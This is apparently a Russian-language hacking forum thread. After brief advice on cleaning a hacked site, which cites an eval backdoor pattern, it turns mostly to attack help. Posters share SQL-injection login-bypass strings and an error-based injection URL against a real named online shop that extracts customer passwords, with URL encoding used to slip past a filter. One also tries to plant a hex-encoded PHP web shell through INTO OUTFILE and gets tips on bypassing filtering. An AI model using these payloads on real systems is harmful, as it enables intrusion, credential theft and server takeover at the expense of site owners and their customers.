посмотрите даты изменения файлов, бэкдоры вида <? eval($_GET[q]); ?>, конфигурацию всего сервера (устаревшая? вомзожно стоит накатить секурные апдейты?), если cms, тоже обновить. также изучайте логи и смотрите, куда имеено залились. ну и конечно, советую обратиться к спецалисту, например вот
Сколько у вас сайтов на одном аккаунте? если несколько то их все разом чистить надо, но читска, как токовой не устронит проблему, нужно искать ее корень и проводить профилактические меры по предотвращению подобных ситуаций!
чем же можно зашифровать данные поступающие в базу ? кроме пароля открытые остаются email - они же логины, телефоны, номера карт например и нужно что бы эти данные из базы могла расшифровать только функция в скрипте принимающая и обрабатывающая данные. данные хранятся в шифрованом виде
возможно ли зашифровать передачу скрытого ssid для wifi точки, что бы его нельзя было перехватить ? шифрование точки: WPA-PSK/WPA2-PSK зашифровать так же как и пароль wifi точки !
Создаю пост запрос: login=Admin'+--+\&pass=123 Слэш вызывает ошибку: WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1 Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать? P.S. Пробовал.(
пробовали с комбинацией OR? http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html
Code: login=Admin'+or+login+='[B]bad_login_name[/B]&pass=[B]any[/B] bad_login_name - любой логин кроме необходимого, к которому не подходит пасс any
Не помогло. В исходном коде введенные мною кавычки выглядят как & # 039; только без пробела. Это играет роль?
кавычки не экранируются и не фильтруются. попробуйте Code: SELECT * FROM users WHERE `login` = 'Admin' AND `password` = '1' OR '1'='1' -- это равносильно запросу Code: SELECT * FROM users WHERE login='Admin' AND TRUE поэтому будет выборка из таблицы, где значение колонки login == Admin.
Есть Error based Injection. Нужные данные находятся в соседней бд, при запросе "select pass from users" все выводит норм, при запросе "select table_name from+information_schema.tables" - все норм Но когда пытаешься вытащить данные(таблицы и колонки вытягивает норм) с соседней бд срабатывает защита: "select pass2 from нужнаяБД.users". Примечательно, но и когда выполняешь запрос типа "select pass from БДвкоторойсижу.users" так же срабатывает защита. Подумал бы что дело в "." между бд и ьаблицей, но с information_schema вытягивает ведь. Застопорился, что можно попробовать? норм HTML: _http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+customers+limit+0,1))))=1 ошибка HTML: http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+formaggiodb_osc.customers+limit+0,1))))=1
действительно фильтр на имя бд. помогло урл кодирование: Code: http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+forma%67%67iodb_osc.customers+limit+0,1))))=1 где %6767 = gg, то есть имя бд formaggiodb_osc
Как залить шелл при sql-иъекции. Права file_priv есть. Могу читать файлы. делаю 1+union+select+0,1,0x3C3F7068702073797374656D28245F4745545B63293B203F3E+INTO+OUTFILE+'/tmp/1.txt' -- Файл не заливается. По ходу дела фильтрация на кавычки. Как обойти и залить шелл?
https://forum.antichat.ru/showpost.php?p=663815&postcount=39 https://forum.antichat.ru/threadnav34338-1-10.html соответственно, mg=on и mq=off